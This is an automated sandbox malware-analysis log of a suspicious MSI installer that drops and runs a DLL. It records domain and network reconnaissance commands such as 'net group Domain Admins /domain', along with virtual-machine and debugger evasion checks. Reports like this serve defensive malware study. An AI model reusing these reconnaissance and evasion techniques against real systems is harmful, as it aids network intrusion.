            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\nltest.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: browcli.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: browcli.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: lavita.msiStatic file information: File size 2416640 > 1048576
            Source: Binary string: C:\dvs\p4\build\sw\rel\gfclient\rel_03&3!ZxZQ9rbTQA!n8N>7T3de\GfeXCode\win7_amd64_release\GfeXCode64.pdb source: rundll32.exe, 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmp, appgpuset.dll.2.dr
            Source: Binary string: de\GfeXCode\win7_amd64_release\GfeXCode64.pdb source: rundll32.exe, 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmp, appgpuset.dll.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.dr
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8489E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,7_2_0B8489E4
            Source: appgpuset.dll.2.drStatic PE information: real checksum: 0x32b556 should be: 0x3d53c2
            Source: appgpuset.dll.2.drStatic PE information: section name: .giats
            Source: appgpuset.dll.2.drStatic PE information: section name: minATL
            Source: appgpuset.dll.2.drStatic PE information: section name: .00cfg
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002CF10 push rsp; iretd 4_2_000000018002CF11
            Source: C:\Windows\explorer.exeCode function: 7_2_02F2E690 push rbx; retf 7_2_02F2E697
            Source: C:\Windows\explorer.exeCode function: 7_2_02F2E3E7 push 62DF9C6Fh; iretd 7_2_02F2E3EC
            Source: C:\Windows\explorer.exeCode function: 7_2_02F2F551 push rsi; retf 7_2_02F2F552

            Persistence and Installation Behavior

            barindex
            Uses ipconfig to lookup or modify the Windows network settings
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\gpuset\appgpuset.dllJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC2F1.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC39F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC35F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC3DE.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC2F1.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC39F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC35F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC3DE.tmpJump to dropped file

            Boot Survival

            barindex
            Uses net.exe to modify the status of services
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBB800 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00007FFD92DBB800
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8476DC rdtsc 7_2_0B8476DC
            Source: C:\Windows\explorer.exeCode function: 7_2_0B844948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,7_2_0B844948
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,7_2_02F27274
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,7_2_02F28424
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,7_2_02F30610
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 511Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8851Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 896Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 859Jump to behavior
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC2F1.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC39F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC35F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC3DE.tmpJump to dropped file
            Source: C:\Windows\System32\rundll32.exeAPI coverage: 1.3 %
            Source: C:\Windows\explorer.exe TID: 5140Thread sleep time: -221000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 764Thread sleep time: -51100s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 5140Thread sleep time: -8851000s >= -30000sJump to behavior
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domainJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB56A0 FindFirstFileExW,4_2_00007FFD92DB56A0
            Source: C:\Windows\explorer.exeCode function: 7_2_02F2A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,7_2_02F2A8E0
            Source: C:\Windows\explorer.exeCode function: 7_2_02F22B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,7_2_02F22B28
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8416F4 FindFirstFileW,FindNextFileW,LoadLibraryW,7_2_0B8416F4
            Source: C:\Windows\explorer.exeCode function: 7_2_0B846604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,7_2_0B846604
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8E50D8 FindFirstFileA,7_2_0B8E50D8
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBD230 GetSystemInfo,4_2_00007FFD92DBD230
            Source: explorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
            Source: explorer.exe, 00000007.00000002.4606667288.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000007.00000002.4606667288.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
            Source: explorer.exe, 00000007.00000002.4610617935.00000000098E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
            Source: explorer.exe, 00000007.00000002.4606667288.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
            Source: explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3D9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4606667288.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
            Source: rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
            Source: explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000007.00000002.4610617935.00000000098E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
            Source: explorer.exe, 00000007.00000003.3296435494.0000000002E20000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
            Source: explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000007.00000002.4610617935.00000000098E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-83090
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
            Source: C:\Windows\System32\wbem\WMIC.exeSystem information queried: CodeIntegrityInformation
            Source: C:\Windows\System32\wbem\WMIC.exeSystem information queried: CodeIntegrityInformation
            Source: C:\Windows\System32\findstr.exeSystem information queried: CodeIntegrityInformation
            Source: C:\Windows\System32\wbem\WMIC.exeSystem information queried: KernelDebuggerInformation
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8476DC rdtsc 7_2_0B8476DC
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBB110 IsDebuggerPresent,4_2_00007FFD92DBB110
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018003EEEC EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_000000018003EEEC
            Source: C:\Windows\explorer.exeCode function: 7_2_0B844948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,7_2_0B844948
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8489E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,7_2_0B8489E4
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB5730 GetProcessHeap,4_2_00007FFD92DB5730
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe appgpuset.dll, GfeXcodeFuncJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DBF120 __scrt_fastfail,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFD92DBF120
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180032DD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0000000180032DD8
